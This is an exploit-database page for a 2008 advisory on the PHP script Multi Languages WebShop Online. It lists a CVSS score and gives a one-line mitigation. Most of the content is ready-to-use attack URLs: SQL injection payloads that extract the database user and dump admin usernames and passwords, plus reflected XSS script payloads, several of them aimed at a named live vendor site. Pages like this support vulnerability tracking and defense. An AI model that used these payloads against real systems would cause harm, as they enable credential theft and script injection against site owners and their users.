header-logo
Suggest Exploit
vendor:
Multi Languages WebShop Online
by:
G4N0K
7.5
CVSS
HIGH
SQL Injection and Cross-Site Scripting (XSS)
89 (SQL Injection) and 79 (XSS)
CWE
Product Name: Multi Languages WebShop Online
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities

Multi Languages WebShop Online is vulnerable to SQL Injection and Cross-Site Scripting (XSS). An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords, or to execute malicious scripts in the user's browser.

Mitigation:

Input validation should be used to prevent SQL Injection and XSS attacks. All user-supplied input should be validated and filtered before being used in SQL queries or HTML output.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                            			IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Multi Languages WebShop Online
[~] Language :         	PHP
[~] Website[0]:     	http://webbdomain.com/php/webshopir/
[~] Website[1]:     	http://www.hotscripts.com/Detailed/84437.html
[~] Type :             	Commercial
[~] Report-Date :     	04/11/2008


--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
SQL => id
[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
    http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK

XSS => name
[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13
[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]



--[ L!ve ]--
[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
      http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13
[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E


--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-04]

Navigation

Suggest Exploit

Services By CQR